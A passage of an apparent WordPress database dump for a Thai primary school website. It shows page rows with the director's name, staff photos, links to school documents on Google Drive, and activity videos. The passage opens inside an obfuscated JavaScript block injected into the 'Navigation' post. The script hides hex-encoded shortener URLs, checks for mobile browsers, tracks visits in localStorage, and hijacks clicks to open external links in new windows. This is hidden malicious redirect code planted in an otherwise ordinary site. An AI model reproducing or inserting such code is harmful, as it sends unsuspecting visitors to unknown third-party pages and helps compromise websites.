\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','Navigation','','publish','closed','closed','','navigation','','','2024-07-27 20:27:20','2024-07-27 13:27:20','',0,'http://watprato.ssk.in.th/index.php/2024/07/27/navigation/',0,'wp_navigation','',0),
(13,1,'2024-07-27 20:40:35','2024-07-27 13:40:35','','โลโก้โรงเรียน','','inherit','open','closed','','%e0%b9%82%e0%b8%a5%e0%b9%82%e0%b8%81%e0%b9%89%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99','','','2024-07-27 20:40:35','2024-07-27 13:40:35','',0,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/โลโก้โรงเรียน.png',0,'attachment','image/png',0),
(19,1,'2024-07-27 20:45:17','2024-07-27 13:45:17','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:gallery {\"columns\":3,\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-3 is-cropped\"><!-- wp:image {\"id\":736,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/10/ผอ.วิชุดา-724x1024.jpg\" alt=\"\" class=\"wp-image-736\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph {\"align\":\"center\",\"style\":{\"typography\":{\"fontSize\":\"25px\"}}} -->\n<p class=\"has-text-align-center\" style=\"font-size:25px\">            <strong>     นางวิชุดา ชัยชาญ </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>ผู้อำนวยการโรงเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":754,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/11/560432794_122252459414202781_8219191812793928684_n-1024x726.jpg\" alt=\"\" class=\"wp-image-754\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 